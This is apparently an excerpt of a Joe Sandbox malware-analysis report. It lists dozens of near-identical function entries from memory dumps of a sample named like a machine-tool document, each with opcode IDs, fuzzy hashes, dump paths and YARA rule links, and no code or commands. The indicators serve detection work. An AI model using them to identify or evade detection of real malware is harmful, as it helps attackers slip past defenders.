                                                                                                                                                                                                                          • Snapshot File: hcaresult_11_2_38c80000_SM-0230- J - TOOL 10 DEGREE FOR DWT MACHINE-MF5i.jbxd
                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                          • API ID:
                                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                                          • API String ID:
                                                                                                                                                                                                                          • Opcode ID: 52cc8586587645ae48331fdb0a1a298c6829f01e593b39033d925dc9f763a075
                                                                                                                                                                                                                          • Instruction ID: 6eacf75222b13ccd1e73db1183a9b5792ab43720ee3ee87dedb492212e4f6b66
                                                                                                                                                                                                                          • Opcode Fuzzy Hash: 52cc8586587645ae48331fdb0a1a298c6829f01e593b39033d925dc9f763a075
                                                                                                                                                                                                                          • Instruction Fuzzy Hash: B3D1A078E003188FDB55DFA5C950B9DBBB2FF89300F2081A9D848AB364DB355A86CF51
                                                                                                                                                                                                                          Function 38C83FE8 Relevance: .3, Instructions: 272COMMON
                                                                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                          • Source File: 0000000B.00000002.5972859573.0000000038C80000.00000040.00000800.00020000.00000000.sdmp, Offset: 38C80000, based on PE: false
                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                          • Snapshot File: hcaresult_11_2_38c80000_SM-0230- J - TOOL 10 DEGREE FOR DWT MACHINE-MF5i.jbxd
                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                          • API ID:
                                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                                          • API String ID:
                                                                                                                                                                                                                          • Opcode ID: c93f1d3641eb2db6a6a5d4fec3954451bbd7382a36a8da06fe364f1b0ebb63f9
                                                                                                                                                                                                                          • Instruction ID: 46c2d48e750775eb6d9d6abcc0a42c1df7dcd74a790e6e4bd561efb6c367c5ed
                                                                                                                                                                                                                          • Opcode Fuzzy Hash: c93f1d3641eb2db6a6a5d4fec3954451bbd7382a36a8da06fe364f1b0ebb63f9
                                                                                                                                                                                                                          • Instruction Fuzzy Hash: F0D1BE78E00218CFDB55DFA5C950B9DBBB2FF89300F2081A9D848AB364DB355A86CF51
                                                                                                                                                                                                                          Function 38C81FF8 Relevance: .3, Instructions: 272COMMON
                                                                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                          • Source File: 0000000B.00000002.5972859573.0000000038C80000.00000040.00000800.00020000.00000000.sdmp, Offset: 38C80000, based on PE: false
                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                          • Snapshot File: hcaresult_11_2_38c80000_SM-0230- J - TOOL 10 DEGREE FOR DWT MACHINE-MF5i.jbxd
                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                          • API ID:
                                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                                          • API String ID:
                                                                                                                                                                                                                          • Opcode ID: cc538550aa6dcbb165162bd2a837135baaefa353e235f8b31e0a911f6f669c98
                                                                                                                                                                                                                          • Instruction ID: dba5d84a5bea6a2295bbc3b41775fbbd8d6a0cfd13f69042ec132736ced14f4b
                                                                                                                                                                                                                          • Opcode Fuzzy Hash: cc538550aa6dcbb165162bd2a837135baaefa353e235f8b31e0a911f6f669c98
                                                                                                                                                                                                                          • Instruction Fuzzy Hash: 7AD1BE78E002188FDB55DFA5C954B9DBBB2FF89300F2081A9D848AB364DB355E86CF51
                                                                                                                                                                                                                          Function 38C80DF0 Relevance: .3, Instructions: 272COMMON
                                                                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                          • Source File: 0000000B.00000002.5972859573.0000000038C80000.00000040.00000800.00020000.00000000.sdmp, Offset: 38C80000, based on PE: false
                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                          • Snapshot File: hcaresult_11_2_38c80000_SM-0230- J - TOOL 10 DEGREE FOR DWT MACHINE-MF5i.jbxd
                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                          • API ID:
                                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                                          • API String ID:
                                                                                                                                                                                                                          • Opcode ID: bfeac7f222f05b3c6b339b732614f302ab982d2954c12ef9679028ac3912f2b7
                                                                                                                                                                                                                          • Instruction ID: 6fa1c1002b4b84065bb53095683409eb960db09c6e74890271775f997dc25df2
                                                                                                                                                                                                                          • Opcode Fuzzy Hash: bfeac7f222f05b3c6b339b732614f302ab982d2954c12ef9679028ac3912f2b7
                                                                                                                                                                                                                          • Instruction Fuzzy Hash: 5AD1BF78E00218CFDB55DFA5C950B9DBBB2FF89300F2081A9D848AB364DB355A86CF51
                                                                                                                                                                                                                          Function 38C82488 Relevance: .3, Instructions: 272COMMON
                                                                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                          • Source File: 0000000B.00000002.5972859573.0000000038C80000.00000040.00000800.00020000.00000000.sdmp, Offset: 38C80000, based on PE: false
                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                          • Snapshot File: hcaresult_11_2_38c80000_SM-0230- J - TOOL 10 DEGREE FOR DWT MACHINE-MF5i.jbxd
                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                          • API ID:
                                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                                          • API String ID:
                                                                                                                                                                                                                          • Opcode ID: cd98689d9d1530c43578e76dc33c7fe5868c05fe0cc051375ba49ecef8af7fff
                                                                                                                                                                                                                          • Instruction ID: 89248891b3c086696f3774f66996749492cbd874849637f5184445b70a642e9c
                                                                                                                                                                                                                          • Opcode Fuzzy Hash: cd98689d9d1530c43578e76dc33c7fe5868c05fe0cc051375ba49ecef8af7fff
                                                                                                                                                                                                                          • Instruction Fuzzy Hash: 52D1B078E00218CFDB55DFA5C954B9DBBB2FF89300F2081A9D848AB364DB355A86CF51
                                                                                                                                                                                                                          Function 38C81280 Relevance: .3, Instructions: 272COMMON
                                                                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                          • Source File: 0000000B.00000002.5972859573.0000000038C80000.00000040.00000800.00020000.00000000.sdmp, Offset: 38C80000, based on PE: false
                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                          • Snapshot File: hcaresult_11_2_38c80000_SM-0230- J - TOOL 10 DEGREE FOR DWT MACHINE-MF5i.jbxd
                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                          • API ID:
                                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                                          • API String ID:
                                                                                                                                                                                                                          • Opcode ID: 535ad890a448fe026647f118afd7bfebe6e93588b9ea638f96bb2a7d0e705fbf
                                                                                                                                                                                                                          • Instruction ID: 7fa96e790ba3d88a8fa723f947a2dbf97be018108d699a7110deb88c90a15ed9
                                                                                                                                                                                                                          • Opcode Fuzzy Hash: 535ad890a448fe026647f118afd7bfebe6e93588b9ea638f96bb2a7d0e705fbf
                                                                                                                                                                                                                          • Instruction Fuzzy Hash: E1D1B178E00218CFDB55DFA5C950B9DBBB2FF89300F2081A9D849AB364DB355A86CF51
                                                                                                                                                                                                                          Function 38C84D98 Relevance: .3, Instructions: 272COMMON
                                                                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                          • Source File: 0000000B.00000002.5972859573.0000000038C80000.00000040.00000800.00020000.00000000.sdmp, Offset: 38C80000, based on PE: false
                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                          • Snapshot File: hcaresult_11_2_38c80000_SM-0230- J - TOOL 10 DEGREE FOR DWT MACHINE-MF5i.jbxd
                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                          • API ID:
                                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                                          • API String ID:
                                                                                                                                                                                                                          • Opcode ID: 705ffa38c0e63184b9d8f4a0149c0ea9b5e5f3deafcdcd1d4958ce83943821be
                                                                                                                                                                                                                          • Instruction ID: 90c1da89935ba26afaa1bda5ed26eef8e9d8643eaab500cf33a864d26b2effbb
                                                                                                                                                                                                                          • Opcode Fuzzy Hash: 705ffa38c0e63184b9d8f4a0149c0ea9b5e5f3deafcdcd1d4958ce83943821be
                                                                                                                                                                                                                          • Instruction Fuzzy Hash: 8BD1BF78E00218CFDB55DFA5C950B9DBBB2FF89300F2081A9D848AB365DB355A86CF51
                                                                                                                                                                                                                          Function 38C82DA8 Relevance: .3, Instructions: 272COMMON
                                                                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                          • Source File: 0000000B.00000002.5972859573.0000000038C80000.00000040.00000800.00020000.00000000.sdmp, Offset: 38C80000, based on PE: false
                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                          • Snapshot File: hcaresult_11_2_38c80000_SM-0230- J - TOOL 10 DEGREE FOR DWT MACHINE-MF5i.jbxd
                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                          • API ID:
                                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                                          • API String ID:
                                                                                                                                                                                                                          • Opcode ID: 393ee4281627bbd91557a7dc440e9b5ef1cc3d1dfbb83dbaa0845b3f62df938f
                                                                                                                                                                                                                          • Instruction ID: 3dedbd40a0348d26833770172d969165dc0947b158bee39a79a8b95e68f73dba
                                                                                                                                                                                                                          • Opcode Fuzzy Hash: 393ee4281627bbd91557a7dc440e9b5ef1cc3d1dfbb83dbaa0845b3f62df938f
                                                                                                                                                                                                                          • Instruction Fuzzy Hash: 1AD1B178E00218CFDB55DFA5C950B9DBBB2FF89300F6081A9D848AB364DB355A86CF51
                                                                                                                                                                                                                          Function 38C856B8 Relevance: .3, Instructions: 272COMMON
                                                                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                          • Source File: 0000000B.00000002.5972859573.0000000038C80000.00000040.00000800.00020000.00000000.sdmp, Offset: 38C80000, based on PE: false
                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                          • Snapshot File: hcaresult_11_2_38c80000_SM-0230- J - TOOL 10 DEGREE FOR DWT MACHINE-MF5i.jbxd
                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                          • API ID:
                                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                                          • API String ID:
                                                                                                                                                                                                                          • Opcode ID: 11695423d5bf904305575f96584be7bbf322fef0735a0a99d7aff0f19d6d109d
                                                                                                                                                                                                                          • Instruction ID: c6a374f38289fa67780f80ad9ab7c8c4d836a66c5ad445d3583e4eaad25ed568
                                                                                                                                                                                                                          • Opcode Fuzzy Hash: 11695423d5bf904305575f96584be7bbf322fef0735a0a99d7aff0f19d6d109d
                                                                                                                                                                                                                          • Instruction Fuzzy Hash: C4D1C178E002188FDB55DFA5C940B9DBBB2FF89300F1081A9D448AB365DB355E86CF51
                                                                                                                                                                                                                          Function 38C80040 Relevance: .3, Instructions: 272COMMON
                                                                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                          • Source File: 0000000B.00000002.5972859573.0000000038C80000.00000040.00000800.00020000.00000000.sdmp, Offset: 38C80000, based on PE: false
                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                          • Snapshot File: hcaresult_11_2_38c80000_SM-0230- J - TOOL 10 DEGREE FOR DWT MACHINE-MF5i.jbxd
                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                          • API ID:
                                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                                          • API String ID:
                                                                                                                                                                                                                          • Opcode ID: efc73333e5ac312e49c2ed6c71b8d2012f142adff58872eccabf7def03fcbb4a
                                                                                                                                                                                                                          • Instruction ID: 1d396f02e9f1851f30af92bc3f933908217c6fe5c41e18d8eccdaf27b19f871b
                                                                                                                                                                                                                          • Opcode Fuzzy Hash: efc73333e5ac312e49c2ed6c71b8d2012f142adff58872eccabf7def03fcbb4a
                                                                                                                                                                                                                          • Instruction Fuzzy Hash: 38D1A078E003188FDB55DFA5C950B9DBBB2FF89300F6081A9D848AB364DB355A86CF51
                                                                                                                                                                                                                          Function 38C83B58 Relevance: .3, Instructions: 272COMMON
                                                                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                          • Source File: 0000000B.00000002.5972859573.0000000038C80000.00000040.00000800.00020000.00000000.sdmp, Offset: 38C80000, based on PE: false
                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                          • Snapshot File: hcaresult_11_2_38c80000_SM-0230- J - TOOL 10 DEGREE FOR DWT MACHINE-MF5i.jbxd
                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                          • API ID:
                                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                                          • API String ID:
                                                                                                                                                                                                                          • Opcode ID: d3f73d561b401d631d5916af1004e32d658882ae0ae4eadc56587d2c68a90f18
                                                                                                                                                                                                                          • Instruction ID: 694ebd69ff18b0a5d3956972ccc09bd6fe74f9a192b073ec07a81b329d13826a
                                                                                                                                                                                                                          • Opcode Fuzzy Hash: d3f73d561b401d631d5916af1004e32d658882ae0ae4eadc56587d2c68a90f18
                                                                                                                                                                                                                          • Instruction Fuzzy Hash: 7ED1AF78E00218CFDB55DFA5C950B9DBBB2FF89300F6081A9D848AB364DB355A86CF51
                                                                                                                                                                                                                          Function 38C81B68 Relevance: .3, Instructions: 272COMMON
                                                                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                          • Source File: 0000000B.00000002.5972859573.0000000038C80000.00000040.00000800.00020000.00000000.sdmp, Offset: 38C80000, based on PE: false
                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                          • Snapshot File: hcaresult_11_2_38c80000_SM-0230- J - TOOL 10 DEGREE FOR DWT MACHINE-MF5i.jbxd
                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                          • API ID:
                                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                                          • API String ID:
                                                                                                                                                                                                                          • Opcode ID: e1ec436609cbe6fa7d088d5181375d4b95b2f58bc1061e0d735b02c18bbc9c58
                                                                                                                                                                                                                          • Instruction ID: 44cb34e8230fa67662a402a8bc637ed07a9d288854a90cecd41a5c823c3f82bc
                                                                                                                                                                                                                          • Opcode Fuzzy Hash: e1ec436609cbe6fa7d088d5181375d4b95b2f58bc1061e0d735b02c18bbc9c58
                                                                                                                                                                                                                          • Instruction Fuzzy Hash: 6FD1A078E002188FDB55DFA5C950B9DBBB2FF89300F6081A9D848AB364DB355A86CF51
                                                                                                                                                                                                                          Function 38C80960 Relevance: .3, Instructions: 272COMMON
                                                                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                          • Source File: 0000000B.00000002.5972859573.0000000038C80000.00000040.00000800.00020000.00000000.sdmp, Offset: 38C80000, based on PE: false
                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                          • Snapshot File: hcaresult_11_2_38c80000_SM-0230- J - TOOL 10 DEGREE FOR DWT MACHINE-MF5i.jbxd
                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                          • API ID:
                                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                                          • API String ID:
                                                                                                                                                                                                                          • Opcode ID: 202588bf108f646bede78e00212fb77900cd6ebac3dcd8a048b62a4296d4e673
                                                                                                                                                                                                                          • Instruction ID: 4f9d55b602e750cd3ff196c75b3e7ce8f432517ef2a3094283510058f6102ffa
                                                                                                                                                                                                                          • Opcode Fuzzy Hash: 202588bf108f646bede78e00212fb77900cd6ebac3dcd8a048b62a4296d4e673
                                                                                                                                                                                                                          • Instruction Fuzzy Hash: A3D1AF78E003188FDB55DFA5C950B9DBBB2FF89300F2081A9D848AB364DB355A86CF51
                                                                                                                                                                                                                          Function 38C84478 Relevance: .3, Instructions: 272COMMON
                                                                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                          • Source File: 0000000B.00000002.5972859573.0000000038C80000.00000040.00000800.00020000.00000000.sdmp, Offset: 38C80000, based on PE: false
                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                          • Snapshot File: hcaresult_11_2_38c80000_SM-0230- J - TOOL 10 DEGREE FOR DWT MACHINE-MF5i.jbxd
                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                          • API ID:
                                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                                          • API String ID:
                                                                                                                                                                                                                          • Opcode ID: f4a5682da21631cb9ff0c671a2fcac4e502142b4f85b9fe4efc935d4e81a7677
                                                                                                                                                                                                                          • Instruction ID: ecffea9680458a3e81af55ed57010bac3492b03425d971b6f2de5673300e88c1
                                                                                                                                                                                                                          • Opcode Fuzzy Hash: f4a5682da21631cb9ff0c671a2fcac4e502142b4f85b9fe4efc935d4e81a7677
                                                                                                                                                                                                                          • Instruction Fuzzy Hash: 78D1AF78E00218CFDB55DFA5C950B9DBBB2FF89300F6081A9D848AB364DB355A86CF51
                                                                                                                                                                                                                          Function 38C84908 Relevance: .3, Instructions: 272COMMON
                                                                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                          • Source File: 0000000B.00000002.5972859573.0000000038C80000.00000040.00000800.00020000.00000000.sdmp, Offset: 38C80000, based on PE: false
                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                          • Snapshot File: hcaresult_11_2_38c80000_SM-0230- J - TOOL 10 DEGREE FOR DWT MACHINE-MF5i.jbxd
                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                          • API ID:
                                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                                          • API String ID:
                                                                                                                                                                                                                          • Opcode ID: 642c8dc35c79188fa6cc750aba1c6b7a5289aad23ab9e9c9e36ecb2c3879408e
                                                                                                                                                                                                                          • Instruction ID: 4b2b566ae7d8251b5e084e5d72d5f9b7d992d5cdfed2bb663ba330eb2f2bfd5f
                                                                                                                                                                                                                          • Opcode Fuzzy Hash: 642c8dc35c79188fa6cc750aba1c6b7a5289aad23ab9e9c9e36ecb2c3879408e
                                                                                                                                                                                                                          • Instruction Fuzzy Hash: 7BD1AF78E00218CFDB55DFA5C950B9DBBB2FF89300F6081A9D848AB364DB355A86CF51
                                                                                                                                                                                                                          Function 38C82918 Relevance: .3, Instructions: 272COMMON
                                                                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                          • Source File: 0000000B.00000002.5972859573.0000000038C80000.00000040.00000800.00020000.00000000.sdmp, Offset: 38C80000, based on PE: false
                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                          • Snapshot File: hcaresult_11_2_38c80000_SM-0230- J - TOOL 10 DEGREE FOR DWT MACHINE-MF5i.jbxd
                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                          • API ID:
                                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                                          • API String ID:
                                                                                                                                                                                                                          • Opcode ID: 38639d95fbcfa41252c70d32b594ce1a576fd7d84be84773053361336e5ae0ca
                                                                                                                                                                                                                          • Instruction ID: 52cc48ca0b09f350b949a8ff07b658f2446afeb4038e6735e2be2e92daf6b0da
                                                                                                                                                                                                                          • Opcode Fuzzy Hash: 38639d95fbcfa41252c70d32b594ce1a576fd7d84be84773053361336e5ae0ca
                                                                                                                                                                                                                          • Instruction Fuzzy Hash: 3BD1CF78E00218CFDB55DFA5C954B9DBBB2FF89300F2081A9D848AB364DB355A86CF41
                                                                                                                                                                                                                          Function 38C85228 Relevance: .3, Instructions: 272COMMON
                                                                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                          • Source File: 0000000B.00000002.5972859573.0000000038C80000.00000040.00000800.00020000.00000000.sdmp, Offset: 38C80000, based on PE: false
                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                          • Snapshot File: hcaresult_11_2_38c80000_SM-0230- J - TOOL 10 DEGREE FOR DWT MACHINE-MF5i.jbxd
                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                          • API ID:
                                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                                          • API String ID:
                                                                                                                                                                                                                          • Opcode ID: 22f62a9e4a239afece1d00ee7a3e71d4839cd216dc474eefecc7c5ceff91b5c2
                                                                                                                                                                                                                          • Instruction ID: 483760e23e3541c98f09a301a2bb29677e929a55d788387a3e03a23f2da7df1e
                                                                                                                                                                                                                          • Opcode Fuzzy Hash: 22f62a9e4a239afece1d00ee7a3e71d4839cd216dc474eefecc7c5ceff91b5c2
                                                                                                                                                                                                                          • Instruction Fuzzy Hash: 34D1BF78E00218CFDB55DFA5C950B9DBBB2FF89300F2081A9D848AB365DB355A86CF51
                                                                                                                                                                                                                          Function 38C83238 Relevance: .3, Instructions: 272COMMON
                                                                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                          • Source File: 0000000B.00000002.5972859573.0000000038C80000.00000040.00000800.00020000.00000000.sdmp, Offset: 38C80000, based on PE: false
                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                          • Snapshot File: hcaresult_11_2_38c80000_SM-0230- J - TOOL 10 DEGREE FOR DWT MACHINE-MF5i.jbxd
                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                          • API ID:
                                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                                          • API String ID:
                                                                                                                                                                                                                          • Opcode ID: d47f5f34b8d81cd414afb9ff1ee64872d088b47ee32b3f8165270e32de8554e3
                                                                                                                                                                                                                          • Instruction ID: 42ef2ea3f7e8e29e5bccc39be9a83a4133be28ae6c097104971dc421407434c5
                                                                                                                                                                                                                          • Opcode Fuzzy Hash: d47f5f34b8d81cd414afb9ff1ee64872d088b47ee32b3f8165270e32de8554e3
                                                                                                                                                                                                                          • Instruction Fuzzy Hash: 2ED1A178E00218CFDB55DFA5C950B9DBBB2FF89300F6081A9D848AB364DB355A86CF51
                                                                                                                                                                                                                          Function 385EC950 Relevance: .3, Instructions: 272COMMON
                                                                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                          • Source File: 0000000B.00000002.5972493877.00000000385E0000.00000040.00000800.00020000.00000000.sdmp, Offset: 385E0000, based on PE: false
                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                          • Snapshot File: hcaresult_11_2_385e0000_SM-0230- J - TOOL 10 DEGREE FOR DWT MACHINE-MF5i.jbxd
                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                          • API ID:
                                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                                          • API String ID:
                                                                                                                                                                                                                          • Opcode ID: e1b06d48e877c7a629ca433e8f9022d8d75d52b6707a615097467f76030b00c8
                                                                                                                                                                                                                          • Instruction ID: dcbade9b71ce4c39a3941f81bdcb4ac92cc6c822ef4f2e322cf245f33511d5ba
                                                                                                                                                                                                                          • Opcode Fuzzy Hash: e1b06d48e877c7a629ca433e8f9022d8d75d52b6707a615097467f76030b00c8
                                                                                                                                                                                                                          • Instruction Fuzzy Hash: 6AD1A078E002188FDB55DFA5C950B9DBBB2FF89300F5081A9D848AB364DB356E86CF51
                                                                                                                                                                                                                          Function 385EE940 Relevance: .3, Instructions: 272COMMON
                                                                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                          • Source File: 0000000B.00000002.5972493877.00000000385E0000.00000040.00000800.00020000.00000000.sdmp, Offset: 385E0000, based on PE: false
                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                          • Snapshot File: hcaresult_11_2_385e0000_SM-0230- J - TOOL 10 DEGREE FOR DWT MACHINE-MF5i.jbxd
                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                          • API ID:
                                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                                          • API String ID:
                                                                                                                                                                                                                          • Opcode ID: 5295add33ee3138d77e965d213206d9f54eb85ee3893a9dd6545c68f120389af
                                                                                                                                                                                                                          • Instruction ID: eb8e2be82e167dcb56c1192cfde453ebaa0580318708b7516c51f563f52db55c
                                                                                                                                                                                                                          • Opcode Fuzzy Hash: 5295add33ee3138d77e965d213206d9f54eb85ee3893a9dd6545c68f120389af
                                                                                                                                                                                                                          • Instruction Fuzzy Hash: B0D1B178E002188FDB55DFA5C950B9DBBB2FF89300F1081A9D848AB364DB355E86CF51
                                                                                                                                                                                                                          Function 385ED270 Relevance: .3, Instructions: 272COMMON
                                                                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                          • Source File: 0000000B.00000002.5972493877.00000000385E0000.00000040.00000800.00020000.00000000.sdmp, Offset: 385E0000, based on PE: false
                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                          • Snapshot File: hcaresult_11_2_385e0000_SM-0230- J - TOOL 10 DEGREE FOR DWT MACHINE-MF5i.jbxd
                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                          • API ID:
                                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                                          • API String ID:
                                                                                                                                                                                                                          • Opcode ID: 60f5fe65c5444d805d0e13093fd964dbd3b4683ecc4f9c65e1b6933e8ed142ee
                                                                                                                                                                                                                          • Instruction ID: 921efabbe4a5352bf1e284fe970cf6d4718cf27d53a73b8009437f9ca45ca26a
                                                                                                                                                                                                                          • Opcode Fuzzy Hash: 60f5fe65c5444d805d0e13093fd964dbd3b4683ecc4f9c65e1b6933e8ed142ee
                                                                                                                                                                                                                          • Instruction Fuzzy Hash: EED1B278E00218CFDB55DFA9C950B9DBBB2FF89300F5081A9D848AB364DB355A85CF51
                                                                                                                                                                                                                          Function 385EF260 Relevance: .3, Instructions: 272COMMON
                                                                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                          • Source File: 0000000B.00000002.5972493877.00000000385E0000.00000040.00000800.00020000.00000000.sdmp, Offset: 385E0000, based on PE: false
                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                          • Snapshot File: hcaresult_11_2_385e0000_SM-0230- J - TOOL 10 DEGREE FOR DWT MACHINE-MF5i.jbxd
                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                          • API ID:
                                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                                          • API String ID:
                                                                                                                                                                                                                          • Opcode ID: fa8777aedce093b3d23ee7b0142c2f1ba31430d25a84113d0c8e272632ed8e72
                                                                                                                                                                                                                          • Instruction ID: a9400c3be270101a8b0258c5e4daf0b91a2032e83d407fa889f3909cc2cac19e
                                                                                                                                                                                                                          • Opcode Fuzzy Hash: fa8777aedce093b3d23ee7b0142c2f1ba31430d25a84113d0c8e272632ed8e72
                                                                                                                                                                                                                          • Instruction Fuzzy Hash: 43D1B278E00218CFDB55DFA5C950B9DBBB2FF89300F5081A9D848AB364DB355A85CF51
                                                                                                                                                                                                                          Function 385EB710 Relevance: .3, Instructions: 272COMMON
                                                                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                          • Source File: 0000000B.00000002.5972493877.00000000385E0000.00000040.00000800.00020000.00000000.sdmp, Offset: 385E0000, based on PE: false
                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                          • Snapshot File: hcaresult_11_2_385e0000_SM-0230- J - TOOL 10 DEGREE FOR DWT MACHINE-MF5i.jbxd
                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                          • API ID:
                                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                                          • API String ID:
                                                                                                                                                                                                                          • Opcode ID: d5eb20503f88b7558851b4605356d6bd1bdde6606f4580473394cafd443ca951
                                                                                                                                                                                                                          • Instruction ID: ab33e89798383ca3873c15a147c687aa2ff3794ee9ccf9dd3cc52c667e6af0a0
                                                                                                                                                                                                                          • Opcode Fuzzy Hash: d5eb20503f88b7558851b4605356d6bd1bdde6606f4580473394cafd443ca951
                                                                                                                                                                                                                          • Instruction Fuzzy Hash: 94D1A178E01218CFDB55DFA5C950B9DBBB2FF89300F1081A9D848AB364DB356A86CF51
                                                                                                                                                                                                                          Function 385ED700 Relevance: .3, Instructions: 272COMMON
                                                                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                          • Source File: 0000000B.00000002.5972493877.00000000385E0000.00000040.00000800.00020000.00000000.sdmp, Offset: 385E0000, based on PE: false
                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                          • Snapshot File: hcaresult_11_2_385e0000_SM-0230- J - TOOL 10 DEGREE FOR DWT MACHINE-MF5i.jbxd
                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                          • API ID:
                                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                                          • API String ID:
                                                                                                                                                                                                                          • Opcode ID: d75fd0c90902a46d94cac25c5502ee9ed265d520f2e283aca0061debab06c1ed
